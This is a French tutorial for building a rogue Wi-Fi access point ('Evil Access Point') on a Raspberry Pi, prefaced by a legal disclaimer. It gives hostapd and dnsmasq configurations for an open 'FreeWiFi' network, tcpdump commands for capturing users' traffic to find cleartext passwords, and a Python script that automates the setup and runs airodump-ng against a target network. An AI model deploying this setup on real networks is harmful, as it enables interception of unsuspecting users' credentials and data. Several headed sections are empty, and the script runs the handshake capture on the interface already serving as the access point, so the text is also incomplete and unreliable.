⚠️ Avertissement

Ce tutoriel est fourni à des fins éducatives uniquement. La création d'un Evil Access Point (EAP) sans autorisation explicite est illégale et peut entraîner des poursuites judiciaires. Utilisez ces techniques uniquement dans le cadre de tests de sécurité légitimes pour évaluer et renforcer la sécurité des réseaux.

Exploitation de Failles Réseau avec une Raspberry Pi en Mode ESP (Evil Access Point)

Objectif

Utiliser une Raspberry Pi (modèle Pi 3, Pi 4, ou Pi Zero) pour créer un Evil Access Point (EAP), capturer les données réseau des utilisateurs connectés, et exploiter des failles de sécurité comme des mots de passe Wi-Fi vulnérables ou des sessions non sécurisées.

Prérequis

Tutoriel détaillé

1. Préparation de la Raspberry Pi

2. Connexion et Mise à Jour

Connecter en SSH :

ssh pi@<IP_de_votre_Raspberry_Pi>

Mettre à jour les paquets :

sudo apt-get update && sudo apt-get upgrade -y

3. Installation des Dépendances Nécessaires

Installer hostapd, dnsmasq, et aircrack-ng :

sudo apt-get install hostapd dnsmasq aircrack-ng -y

Désactiver le démarrage automatique de ces services pour éviter les conflits :

sudo systemctl stop hostapd
sudo systemctl stop dnsmasq

4. Configuration de l’Evil Access Point (EAP)

Créer un fichier de configuration pour hostapd (/etc/hostapd/hostapd.conf) :

interface=wlan0
driver=nl80211
ssid=FreeWiFi
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0

Créer un fichier de configuration pour dnsmasq (/etc/dnsmasq.conf) :

interface=wlan0
dhcp-range=192.168.1.2,192.168.1.50,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=192.168.1.1

Configurer l’interface réseau :

sudo ip link set wlan0 up
sudo ip addr add 192.168.1.1/24 dev wlan0

5. Activation du Point d'Accès et Capture de Données

Lancer hostapd et dnsmasq :

sudo hostapd /etc/hostapd/hostapd.conf &
sudo dnsmasq -C /etc/dnsmasq.conf &

Utiliser Wireshark ou tcpdump pour capturer le trafic réseau :

sudo tcpdump -i wlan0 -w capture.pcap

Observer les requêtes pour détecter les mots de passe ou données sensibles envoyées en clair.

6. Exploitation de Handshakes Wi-Fi avec Aircrack-ng

Script Python pour Automatisation des Étapes

Automatisons l’ensemble du processus avec un script Python qui configure le point d'accès, démarre la capture, et surveille les handshakes.


import os
import time

def setup_network():
    print("[*] Configuring network interface...")
    os.system("sudo ip link set wlan0 up")
    os.system("sudo ip addr add 192.168.1.1/24 dev wlan0")

def start_services():
    print("[*] Starting hostapd and dnsmasq...")
    os.system("sudo hostapd /etc/hostapd/hostapd.conf &")
    os.system("sudo dnsmasq -C /etc/dnsmasq.conf &")

def capture_traffic():
    print("[*] Capturing traffic...")
    os.system("sudo tcpdump -i wlan0 -w /tmp/capture.pcap &")

def monitor_handshake():
    print("[*] Monitoring for handshakes...")
    bssid = input("Enter BSSID of target network: ")
    channel = input("Enter channel of target network: ")
    os.system(f"sudo airodump-ng --bssid {bssid} -c {channel} -w /tmp/handshake wlan0")

def main():
    setup_network()
    start_services()
    capture_traffic()
    time.sleep(5)  # Wait for services to stabilize
    monitor_handshake()

if __name__ == "__main__":
    print("Evil Access Point Automation")
    main()
        

Sécurisation et Bonnes Pratiques

Validation et Compatibilité

Tester sur différents appareils pour s’assurer que le point d’accès fonctionne avec des environnements variés (Android, iOS, Windows, etc.).